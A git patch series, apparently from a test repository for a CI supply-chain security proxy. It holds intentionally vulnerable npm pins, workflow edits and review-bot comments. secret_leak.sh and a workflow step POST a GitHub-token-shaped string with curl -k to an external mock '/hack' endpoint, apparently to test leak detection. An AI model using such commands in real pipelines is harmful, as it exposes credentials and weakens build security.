"eslint-plugin-react": "^7.37.4", - "eslint-plugin-react-hooks": "^5.2.0", - "eslint-scope": "^8.2.0", - "eslint-visitor-keys": "^4.2.0", - "esprima": "^4.0.1", - "esrecurse": "^4.3.0", - "estraverse": "^5.3.0", - "execa": "^9.5.2", - "express": "^4.21.2", - "express-session": "^1.18.1", - "extend-shallow": "^3.0.2", - "file-exists": "^5.0.1", - "file-saver": "^2.0.5", - "fill-range": "^7.1.1", - "finalhandler": "^1.3.1", - "find-cache-dir": "^5.0.0", - "find-up": "^7.0.0", - "font-awesome": "^4.7.0", - "forever": "^4.0.3", - "form-data": "^4.0.2", - "formik": "^2.4.6", - "fs-extra": "^11.3.0", - "fs-extra-promise": "^1.0.1", - "fs.realpath": "^1.0.0", - "function-bind": "^1.1.2", - "get-caller-file": "^2.0.5", - "get-intrinsic": "^1.3.0", - "get-stream": "^9.0.1", - "glob": "^11.0.1", - "glob-parent": "^6.0.2", - "globals": "^16.0.0", - "graceful-fs": "^4.2.11", - "graphql": "^16.10.0", - "graphql-tag": "^2.12.6", - "has": "^1.0.4", - "has-flag": "^5.0.1", - "has-symbols": "^1.1.0", - "has-value": "^2.0.2", - "has-values": "^2.0.1", - "helmet": "^8.0.0", - "history": "^5.3.0", - "html-to-text": "^9.0.5", - "http-call": "^5.3.0", - "http-errors": "^2.0.0", - "http-status-codes": "^2.3.0", - "husky": "^9.1.7", - "i18next": "^24.2.2", - "iconv-lite": "^0.6.3", - "ieee754": "^1.2.1", - "ignore": "^7.0.3", - "immer": "^10.1.1", - "import-fresh": "^3.3.1", - "imurmurhash": "^0.1.4", - "indent-string": "^5.0.0", - "inflight": "^1.0.6", - "inherits": "^2.0.4", - "ioredis": "^5.5.0", - "ipaddr.js": "^2.2.0", - "is-accessor-descriptor": "^3.0.5", - "is-arrayish": "^0.3.2", - "is-callable": "^1.2.7", - "is-core-module": "^2.16.1", - "is-data-descriptor": "^2.1.3", - "is-date-object": "^1.1.0", - "is-descriptor": "^3.1.1", - "is-extendable": "^1.0.1", - "is-extglob": "^2.1.1", - "is-fullwidth-code-point": "^5.0.0", - "is-glob": "^4.0.3", - "is-number": "^7.0.0", - "is-plain-obj": "^4.1.0", - "is-regex": "^1.2.1", - "is-stream": "^4.0.1", - "is-symbol": "^1.1.1", - "is-wsl": 
"^3.1.0", - "isarray": "^2.0.5", - "isexe": "^3.1.1", - "isobject": "^4.0.0", - "jest": "^29.7.0", - "jest-worker": "^29.7.0", - "joi": "^17.13.3", - "jquery": "^3.7.1", - "jqueryui": "^1.11.1", - "js-cookie": "^3.0.5", - "js-tokens": "^9.0.1", - "js-yaml": "^4.1.0", - "jsesc": "^3.1.0", - "json-schema-traverse": "^1.0.0", - "json-stable-stringify": "^1.2.1", - "json5": "^2.2.3", - "jsonschema": "^1.5.0", - "jsonwebtoken": "^9.0.2", - "junit": "^1.4.9", - "jwt-decode": "^4.0.0", - "kind-of": "^6.0.3", - "knex": "^3.1.0", - "lint-staged": "^15.4.3", - "loader-utils": "^3.3.1", - "locate-path": "^7.2.0", - "lodash": "^4.17.21", - "lru-cache": "^11.0.2", - "luxon": "^3.5.0", - "lwc": "^8.14.0", - "make-dir": "^5.0.0", - "marked": "^15.0.7", - "mathjs": "^14.3.0", - "memoizee": "^0.4.17", - "micromatch": "^4.0.8", - "mime": "^4.0.6", - "mime-db": "^1.53.0", - "mime-types": "^2.1.35", - "mimic-fn": "^5.0.0", - "mini-css-extract-plugin": "^2.9.2", - "minimatch": "^10.0.1", - "minimist": "^1.2.8", - "mkdirp": "^3.0.1", - "mocha": "^11.1.0", - "moment": "^2.30.1", - "moment-timezone": "^0.5.47", - "mongodb": "^6.14.0", - "morgan": "^1.10.0", - "ms": "^2.1.3", - "mysql": "^2.18.1", - "needle": "^3.3.1", - "negotiator": "^1.0.0", - "netrc-parser": "^3.1.6", - "newrelic": "^12.14.0", - "next": "^15.2.0", - "node-esapi": "^0.0.1", - "node-fetch": "^3.3.2", - "node-releases": "^2.0.19", - "nodemon": "^3.1.9", - "nopt": "^8.1.0", - "normalize-path": "^3.0.0", - "npm-run-path": "^6.0.0", - "object-inspect": "^1.13.4", - "object-keys": "^1.1.1", - "object.assign": "^4.1.7", - "oboe": "^2.1.7", - "once": "^1.4.0", - "onetime": "^7.0.0", - "optionator": "^0.9.4", - "p-limit": "^6.2.0", - "p-locate": "^6.0.0", - "p-map": "^7.0.3", - "p-try": "^3.0.0", - "papaparse": "^5.5.2", - "parse-json": "^8.1.0", - "parse5": "^7.2.1", - "passport": "^0.7.0", - "path-exists": "^5.0.0", - "path-is-absolute": "^2.0.0", - "path-key": "^4.0.0", - "path-parse": "^1.0.7", - "path-type": "^6.0.0", - 
"pg": "^8.13.3", - "picocolors": "^1.1.1", - "picomatch": "^4.0.2", - "pify": "^6.1.0", - "pino": "^9.6.0", - "pkg-dir": "^8.0.0", - "please-upgrade-node": "^3.2.0", - "postcss": "^8.5.3", - "postcss-selector-parser": "^7.1.0", - "postmonger": "^0.0.16", - "prettier": "^3.5.3", - "pretty-format": "^29.7.0", - "process-nextick-args": "^2.0.1", - "prom-client": "^15.1.3", - "prop-types": "^15.8.1", - "proxy-addr": "^2.0.7", - "psl": "^1.15.0", - "pump": "^3.0.2", - "punycode": "^2.3.1", - "puppeteer": "^24.3.0", - "qs": "^6.14.0", - "query-string": "^9.1.1", - "raw-body": "^3.0.0", - "react": "^19.0.0", - "react-bootstrap": "^2.10.9", - "react-dom": "^19.0.0", - "react-helmet": "^6.1.0", - "react-hook-form": "^7.54.2", - "react-i18next": "^15.4.1", - "react-intl": "^7.1.6", - "react-query": "^3.39.3", - "react-redux": "^9.2.0", - "react-router": "^7.2.0", - "react-router-dom": "^7.2.0", - "react-scripts": "^5.0.1", - "react-select": "^5.10.0", - "reactable": "^1.1.0", - "readable-stream": "^4.7.0", - "readdirp": "^4.1.2", - "recharts": "^2.15.1", - "redis": "^4.7.0", - "redux": "^5.0.1", - "redux-thunk": "^3.1.0", - "reflect-metadata": "^0.2.2", - "regenerator-runtime": "^0.14.1", - "request": "^2.88.2", - "request-promise": "^4.2.6", - "resolve": "^1.22.10", - "resolve-from": "^5.0.0", - "rimraf": "^6.0.1", - "rxjs": "^7.8.2", - "safe-buffer": "^5.2.1", - "safer-buffer": "^2.1.2", - "sass": "^1.85.1", - "sax": "^1.4.1", - "schema-utils": "^4.3.0", - "semver": "^7.7.1", - "send": "^1.1.0", - "setprototypeof": "^1.2.0", - "sha1": "^1.1.1", - "shebang-command": "^2.0.0", - "shebang-regex": "^4.0.0", - "signal-exit": "^4.1.0", - "slash": "^5.1.0", - "slice-ansi": "^7.1.0", - "source-map": "^0.7.4", - "source-map-support": "^0.5.21", - "stats-lite": "^2.2.0", - "statuses": "^2.0.1", - "string-width": "^7.2.0", - "string_decoder": "^1.3.0", - "strip-ansi": "^7.1.0", - "strip-bom": "^5.0.0", - "strip-json-comments": "^5.0.1", - "style-loader": "^4.0.0", - 
"styled-components": "^6.1.15", - "superagent": "^10.1.1", - "supports-color": "^10.0.0", - "swagger-ui-express": "^5.0.1", - "swig": "^1.4.2", - "tapable": "^2.2.1", - "to-fast-properties": "^4.0.0", - "to-regex-range": "^5.0.1", - "toidentifier": "^1.0.1", - "tr46": "^5.0.0", - "tracium": "^0.2.1", - "ts-jest": "^29.2.6", - "ts-loader": "^9.5.2", - "ts-node": "^10.9.2", - "tslib": "^2.8.1", - "type-fest": "^4.36.0", - "typescript": "^5.8.2", - "underscore": "^1.13.7", - "universalify": "^2.0.1", - "uri-js": "^4.4.1", - "url-loader": "^4.1.1", - "util-deprecate": "^1.0.2", - "uuid": "^11.1.0", - "vue": "^3.5.13", - "web-vitals": "^4.2.4", - "webidl-conversions": "^7.0.0", - "webpack": "^5.98.0", - "webpack-cli": "^6.0.1", - "whatwg-fetch": "^3.6.20", - "whatwg-url": "^14.1.1", - "which": "^5.0.0", - "winston": "^3.17.0", - "wrap-ansi": "^9.0.0", - "wrappy": "^1.0.2", - "write-file-atomic": "^6.0.0", - "ws": "^8.18.1", - "ws-non-native": "^0.4.31", - "xml2js": "^0.6.2", - "xtend": "^4.0.2", - "y18n": "^5.0.8", - "yallist": "^5.0.0", - "yargs": "^17.7.2", - "yargs-parser": "^21.1.1", - "yup": "^1.6.1", - "zod": "^3.24.2", - "zone.js": "^0.15.0" + "express": "4.17.1", + "lodash": "4.17.20", + "mongoose": "5.9.2", + "body-parser": "1.19.0", + "cors": "2.8.5", + "dotenv": "8.2.0", + "jsonwebtoken": "8.5.1", + "helmet": "3.23.3", + "morgan": "1.10.0", + "bcryptjs": "2.4.3", + "moment": "2.24.0", + "request": "2.88.2", + "bluebird": "3.7.2", + "debug": "4.1.1", + "async": "3.2.0", + "winston": "3.2.1", + "multer": "1.4.2", + "nodemailer": "6.4.6", + "mysql": "2.18.1", + "pg": "8.2.1", + "redis": "3.0.2", + "socket.io": "2.3.0", + "uuid": "3.3.3", + "validator": "13.1.1", + "xml2js": "0.4.23", + "cheerio": "1.0.0-rc.3", + "crypto-js": "4.0.0", + "node-fetch": "2.6.1", + "sharp": "0.25.4", + "jsonwebtoken": "8.3.0", + "commander": "5.0.0", + "chalk": "4.0.0", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.7.0", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + 
"q": "1.5.1", + "underscore": "1.10.2", + "yargs-parser": "20.2.2", + "jquery": "3.5.1", + "xmlhttprequest": "1.8.0", + "debug": "2.6.9", + "merge": "1.2.1", + "lodash.merge": "4.6.2", + "lodash.defaultsdeep": "4.6.1", + "marked": "0.3.6", + "react": "16.13.1", + "react-dom": "16.13.1", + "axios": "0.19.2" } } From f931fc62e8e9481000e0c88c66720b68988a890b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:11:36 +0545 Subject: [PATCH 47/89] Delete composer.json --- composer.json | 1 - 1 file changed, 1 deletion(-) delete mode 100644 composer.json diff --git a/composer.json b/composer.json deleted file mode 100644 index 8b13789..0000000 --- a/composer.json +++ /dev/null @@ -1 +0,0 @@ - From f5ab88c8db14185efff7c1f8476f94f16a2ce18b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:11:54 +0545 Subject: [PATCH 48/89] Delete mern-social-second-edition/package.json --- mern-social-second-edition/package.json | 63 ------------------------- 1 file changed, 63 deletions(-) delete mode 100644 mern-social-second-edition/package.json diff --git a/mern-social-second-edition/package.json b/mern-social-second-edition/package.json deleted file mode 100644 index 786815a..0000000 --- a/mern-social-second-edition/package.json +++ /dev/null 
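Review bot: The new `dependencies` object lists `jsonwebtoken` (8.5.1 and 8.3.0), `debug` (4.1.1 and 2.6.9) and `marked` (0.7.0 and 0.3.6) twice each. A JSON parser keeps only the last occurrence, so the first pin of each pair is silently dropped and never installed or scanned. If the fixture is meant to cover both versions, the second copy needs an npm alias key such as `"marked-old": "npm:marked@0.3.6"`; otherwise delete the line that loses. Since the manifest is described as intentionally vulnerable, adding `"private": true` would also keep it from being published by accident.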
@@ -1,63 +0,0 @@ -{ - "name": "mern-social", - "version": "2.0.0", - "description": "A MERN stack based social media application", - "author": "Shama Hoque", - "license": "MIT", - "keywords": [ - "react", - "express", - "mongodb", - "node", - "mern" - ], - "repository": { - "type": "git", - "url": "https://github.com/shamahoque/mern-social.git" - }, - "homepage": "https://github.com/shamahoque/mern-social", - "main": "./dist/server.generated.js", - "scripts": { - "development": "nodemon", - "build": "webpack --config webpack.config.client.production.js && webpack --mode=production --config webpack.config.server.js", - "start": "NODE_ENV=production node ./dist/server.generated.js" - }, - "engines": { - "node": "13.12.0", - "npm": "6.14.4" - }, - "devDependencies": { - "@babel/core": "7.9.0", - "@babel/preset-env": "7.9.0", - "@babel/preset-react": "7.9.4", - "babel-loader": "8.1.0", - "file-loader": "6.0.0", - "nodemon": "2.0.2", - "webpack": "4.42.1", - "webpack-cli": "3.3.11", - "webpack-dev-middleware": "3.7.2", - "webpack-hot-middleware": "2.25.0", - "webpack-node-externals": "1.7.2" - }, - "dependencies": { - "@hot-loader/react-dom": "16.13.0", - "@material-ui/core": "4.9.8", - "@material-ui/icons": "4.9.1", - "body-parser": "1.19.0", - "compression": "1.7.4", - "cookie-parser": "1.4.5", - "cors": "2.8.5", - "express": "4.17.1", - "express-jwt": "5.3.1", - "formidable": "1.2.2", - "helmet": "3.22.0", - "jsonwebtoken": "8.5.1", - "lodash": "4.17.15", - "mongoose": "5.9.7", - "react": "16.13.1", - "react-dom": "16.13.1", - "react-hot-loader": "4.12.20", - "react-router": "5.1.2", - "react-router-dom": "5.1.2" - } -} From 0ad3f261fde6219f3ae355cce91aacd008f1c012 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:12:23 +0545 Subject: [PATCH 49/89] Delete .github/workflows/mainphp.yml --- .github/workflows/mainphp.yml | 98 ----------------------------------- 1 file changed, 98 deletions(-) delete mode 100644 .github/workflows/mainphp.yml 
diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml deleted file mode 100644 index 1446b54..0000000 --- a/.github/workflows/mainphp.yml +++ /dev/null 
@@ -1,98 +0,0 @@ -name: Build PHP Package -on: - workflow_dispatch: - -permissions: - checks: write - contents: read - packages: read -env: - API_URL: https://app.stage.veribom.com - -jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{ env.API_URL }}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" - - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{ steps.ecr_details.outputs.username }} - ecr_token: ${{ steps.ecr_details.outputs.token }} - ecr_region: ${{ steps.ecr_details.outputs.region }} - ecr_id: ${{ steps.ecr_details.outputs.registry_id }} - steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" - echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" - echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" - - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 
282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{ needs.ecr_details.outputs.ecr_username }} - password: ${{ needs.ecr_details.outputs.ecr_token }} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} - INVISIRISK_PORTAL: https://app.stage.veribom.com - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: php:8.2 - options: --cap-add=NET_ADMIN - strategy: - matrix: - php-version: [8.2] - steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - - name: Checkout the code - uses: actions/checkout@v3 - - - name: Install Composer - run: | - apt-get update - apt-get install -y curl unzip - apt-get install -y php8.2-cli || apt-get install -y php-cli - curl -k -sS https://getcomposer.org/installer | php - mv composer.phar /usr/local/bin/composer - - - - - name: Install PHP Dependencies - run: composer install From 196958139f840848f4e4e2977a6b2ca4feb37b42 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:15:17 +0545 Subject: [PATCH 50/89] Update main.yml --- .github/workflows/main.yml | 37 ++++++++++++++++++++++++++++--------- 1 file changed, 28 insertions(+), 9 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 0635c62..bca8208 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,13 +1,15 @@ -name: Build NPM Package +name: Build JS Package For Secrets (STAGE) on: workflow_dispatch: + push: + branches: [ STAGE ] permissions: checks: write contents: read packages: read env: - API_URL: https://app.stage.veribom.com + API_URL: https://app.veribom.com jobs: create_scan_in_IR_Portal: 
@@ -62,16 +64,21 @@ jobs: env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.veribom.com + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.veribom.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: - image: node:18-alpine - options: --cap-add=NET_ADMIN + image: node:18-buster + options: --cap-add=NET_ADMIN --privileged strategy: matrix: node-version: [18.x] steps: + - name: Install curl + run: | + apt-get update + apt-get install -y curl + - env: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} run: echo $SCAN_ID @@ -85,6 +92,18 @@ jobs: uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - - - run: npm install -g pnpm - - run: pnpm install + + - name: (Secrets check) Send POST request with GitHub token + run: | + curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ + -H "Content-Type: application/json" \ + -d '{ + "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" + }' + - name: (Secrets check) Make API Request + run: | + curl -k -X POST https://api.github.com/endpoint \ + -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}' + + - name: install dependencies + run: npm install --legacy-peer-deps From 30d09de3f7ba74ddb209993050b75c7415bbfb7b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:16:28 +0545 Subject: [PATCH 51/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index bca8208..9aee284 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,4 +1,4 @@ -name: Build JS Package For Secrets (STAGE) +name: Build JS Package For Secrets on: workflow_dispatch: push: From 9c19b8655cce669bad3bd2c0b78a74e9d9fae45a Mon Sep 17 00:00:00 2001 
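Review bot: `options: --cap-add=NET_ADMIN --privileged` in the `container:` block gives the job container every capability and device access on the runner, which makes the existing `--cap-add=NET_ADMIN` redundant and removes the isolation the narrower flag kept. If the proxy setup only needs to change network rules, keep `options: --cap-add=NET_ADMIN`; if something failed without `--privileged`, add the one capability it needs and say why in a comment above the line. The same hunk moves the image to `node:18-buster`, a Debian release that is presumably past its security-support window, so the added `apt-get install -y curl` step pulls from a base that no longer gets fixes; a supported tag such as `node:18-bookworm` avoids that. The `start_proxy_and_build` job starts and ends outside this hunk.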
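Review bot: Both added `(Secrets check)` steps embed `ghp_`-shaped literals in the workflow and send them with `curl -k`, one of them to a third-party mock host, and nothing in the file says whether the values are synthetic. If they are canary strings for the proxy's secret detection, state that above each step, for example `# synthetic token for secret-detection test; never a live credential`; if either was ever valid it has to be revoked, because it is now in history. `-k` switches certificate verification off; presumably it is there because the PSE proxy re-signs TLS, in which case trusting the proxy CA (`curl --cacert <path-to-proxy-ca.pem>`, path is a placeholder) keeps verification on. The same literal and the same `-k` come back in `secret_leak.sh` (PATCH 54) and `statuscode.sh` (PATCH 53).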
From: ir-paras-oli
Date: Mon, 31 Mar 2025 11:48:33 +0545
Subject: [PATCH 52/89] Update package.json
---
package.json | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/package.json b/package.json
index c468407..2b3c326 100644
--- a/package.json
+++ b/package.json
@@ -57,6 +57,7 @@
 "marked": "0.3.6",
 "react": "16.13.1",
 "react-dom": "16.13.1",
- "axios": "0.19.2"
+ "axios": "0.19.2",
+ "next": "13.5.5"
 }
 }
From 9b7d5d0655f2c565d9819f42ef28c28f2ce4d1a8 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Tue, 1 Apr 2025 09:51:21 +0545
Subject: [PATCH 53/89] Create statuscode.sh
---
statuscode.sh | 11 +++++++++++
1 file changed, 11 insertions(+)
create mode 100644 statuscode.sh
diff --git a/statuscode.sh b/statuscode.sh
new file mode 100644
index 0000000..bec9161
--- /dev/null
+++ b/statuscode.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+
+echo "Checking status code from GitHub API..."
+
+# This request should trigger a 400 Bad Request because 'q' is empty
+curl -k -i -X GET "https://api.github.com/search/repositories?q="
+
+# This request should trigger a 401 Unauthorized if authentication is required but not provided
+# curl -k -i -X GET "https://api.github.com/user"
+
+echo "Status check completed."
From ac4ef936ee81f5d1686157997cb100f6bf75b4e3 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Tue, 1 Apr 2025 09:51:49 +0545
Subject: [PATCH 54/89] Create secret_leak.sh
---
secret_leak.sh | 8 ++++++++
1 file changed, 8 insertions(+)
create mode 100644 secret_leak.sh
diff --git a/secret_leak.sh b/secret_leak.sh
new file mode 100644
index 0000000..f1980ce
--- /dev/null
+++ b/secret_leak.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+# Sending a POST request with a GitHub token (LEAK)
+curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
+ -H "Content-Type: application/json" \
+ -d '{
+ "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+ }'
From 7bc109b5ce52438686a17ffc0a6d9bcf4d31f6ec Mon Sep 17 00:00:00 2001
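Review bot: `statuscode.sh` never looks at a status code: `curl -k -i` prints the headers and body, curl exits 0 on a 4xx response, and the script then prints "Status check completed." whatever came back. To make the expectation in the comment checkable, capture the code and compare it, e.g. `code=$(curl -sS -o /dev/null -w '%{http_code}' "https://api.github.com/search/repositories?q=")` followed by `[ "$code" = "400" ] || exit 1`. The expected value is taken from the script's own comment and should be confirmed against what the API returns through the proxy.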
From: ir-paras-oli
Date: Tue, 1 Apr 2025 09:52:13 +0545
Subject: [PATCH 55/89] Create run_wrapper.sh
---
run_wrapper.sh | 8 ++++++++
1 file changed, 8 insertions(+)
create mode 100644 run_wrapper.sh
diff --git a/run_wrapper.sh b/run_wrapper.sh
new file mode 100644
index 0000000..b6e5e2e
--- /dev/null
+++ b/run_wrapper.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+echo "Starting leak_token.sh execution..."
+bash ./secret_leak.sh # Call the actual script
+bash ./statuscode.sh # Call the actual script
+bash ./push.sh # Call the actual script
+bash ./mimetype.sh # Call the actual script
+echo "Execution completed."
From d97d2bc59482503cbfce89a5f791503cfa13cf02 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Tue, 1 Apr 2025 09:52:34 +0545
Subject: [PATCH 56/89] Create push.sh
---
push.sh | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 push.sh
diff --git a/push.sh b/push.sh
new file mode 100644
index 0000000..8bd4525
--- /dev/null
+++ b/push.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+echo "Marking repository as safe..."
+git config --global --add safe.directory "$GITHUB_WORKSPACE"
+
+echo "Setting up Git user..."
+git config user.name "ir-paras-oli"
+git config user.email "paras.oli@invisirisk.com"
+
+echo "Making changes (creating a file)..."
+echo "Some new content" > new6-file.txt
+git add new6-file.txt
+git commit -m "Add a new file"
+
+echo "Pushing changes to the STAGE branch..."
+git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git
+git push origin STAGE
From d2d16490b0320b838f16e69e4271b8d6eb4f5827 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Tue, 1 Apr 2025 09:52:57 +0545
Subject: [PATCH 57/89] Create mimetype.sh
---
mimetype.sh | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 mimetype.sh
diff --git a/mimetype.sh b/mimetype.sh
new file mode 100644
index 0000000..486795d
--- /dev/null
+++ b/mimetype.sh
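Review bot: `run_wrapper.sh` ignores the exit status of all four scripts, so it ends on `echo "Execution completed."` and returns 0 even when `push.sh` or a curl call fails, and the workflow step that runs it will show green. If every script is expected to succeed, add `set -euo pipefail` under the shebang; if some are expected to be blocked by policy, record each result explicitly, e.g. `bash ./secret_leak.sh || echo "secret_leak.sh exited $?"`. The first message names `leak_token.sh` while the script that runs is `secret_leak.sh`. `push.sh` and `mimetype.sh` only arrive in PATCH 56 and 57, so the wrapper cannot run to the end at this commit.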
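Review bot: The `git remote set-url` line uses `${{ secrets.GITHUB_TOKEN }}` and `${{ github.repository }}`, but Actions only expands those expressions inside workflow YAML; in a standalone script bash reads `${{` as a parameter expansion and should stop with a bad-substitution error. Use the runner's environment instead, `git remote set-url origin "https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git"`, with `GITHUB_TOKEN` passed to the step through `env:`. That still writes the token into `.git/config`, so the simpler option is to delete the line and rely on the credentials `actions/checkout` leaves configured by default. The commit identity is also hard-coded to one person's name and address, which attributes automated commits to them.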
@@ -0,0 +1,3 @@ +#!/bin/bash + +curl -H "Accept: text/html" -o google.html "https://www.google.com" From 151fe9b027b4254ef26a37d560545b0eba86d902 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:57:47 +0545 Subject: [PATCH 58/89] Update and rename main.yml to mainpolicyapplied.yml --- .../{main.yml => mainpolicyapplied.yml} | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) rename .github/workflows/{main.yml => mainpolicyapplied.yml} (86%) diff --git a/.github/workflows/main.yml b/.github/workflows/mainpolicyapplied.yml similarity index 86% rename from .github/workflows/main.yml rename to .github/workflows/mainpolicyapplied.yml index 9aee284..6e3e34a 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -6,7 +6,7 @@ on: permissions: checks: write - contents: read + contents: write packages: read env: API_URL: https://app.veribom.com @@ -92,18 +92,9 @@ jobs: uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - - - name: (Secrets check) Send POST request with GitHub token - run: | - curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ - -H "Content-Type: application/json" \ - -d '{ - "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" - }' - - name: (Secrets check) Make API Request - run: | - curl -k -X POST https://api.github.com/endpoint \ - -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}' + + - name: Execute wrapper script + run: bash run_wrapper.sh - name: install dependencies run: npm install --legacy-peer-deps From 8d37cfedf24b2c452eadb9560b32928fd3b23512 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:58:16 +0545 Subject: [PATCH 59/89] Create mainpolicynotapplied.yml --- .github/workflows/mainpolicynotapplied.yml | 100 +++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 .github/workflows/mainpolicynotapplied.yml 
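Review bot: Changing the workflow-level `contents: read` to `contents: write` in the first hunk of `mainpolicyapplied.yml` hands a write-scoped `GITHUB_TOKEN` to all three jobs. Only `start_proxy_and_build` appears to push, through `run_wrapper.sh`. Keeping `contents: read` at the top and adding a job-level block under `start_proxy_and_build`, `permissions:` with `contents: write`, `checks: write` and `packages: read`, limits the write token to the job that needs it. That job also runs third-party actions in a container started with `--privileged`, so the narrower scope matters there. The `permissions:` block and the jobs continue outside this hunk.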
diff --git a/.github/workflows/mainpolicynotapplied.yml b/.github/workflows/mainpolicynotapplied.yml
new file mode 100644
index 0000000..6e3e34a
--- /dev/null
+++ b/.github/workflows/mainpolicynotapplied.yml
@@ -0,0 +1,100 @@
+name: Build JS Package For Secrets
+on:
+ workflow_dispatch:
+ push:
+ branches: [ STAGE ]
+
+permissions:
+ checks: write
+ contents: write
+ packages: read
+env:
+ API_URL: https://app.veribom.com
+
+jobs:
+ create_scan_in_IR_Portal:
+ runs-on: ubuntu-latest
+ outputs:
+ scan_id: ${{ steps.parseResponse.outputs.scan_id }}
+ steps:
+ - name: Initiating SBOM Scan
+ id: createScan
+ uses: fjogeleit/http-request-action@v1.15.1
+ with:
+ url: '${{env.API_URL}}/utilityapi/v1/scan'
+ method: 'POST'
+ data: '{"api_key": "${{secrets.VB_API_KEY}}"}'
+ - name: Parse Response
+ id: parseResponse
+ run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT"
+ ecr_details:
+ runs-on: ubuntu-latest
+ outputs:
+ ecr_username: ${{steps.ecr_details.outputs.username}}
+ ecr_token: ${{steps.ecr_details.outputs.token}}
+ ecr_region: ${{steps.ecr_details.outputs.region}}
+ ecr_id: ${{steps.ecr_details.outputs.registry_id}}
+ steps:
+ - name: Fetching VB Token
+ id: fetchECRDetails
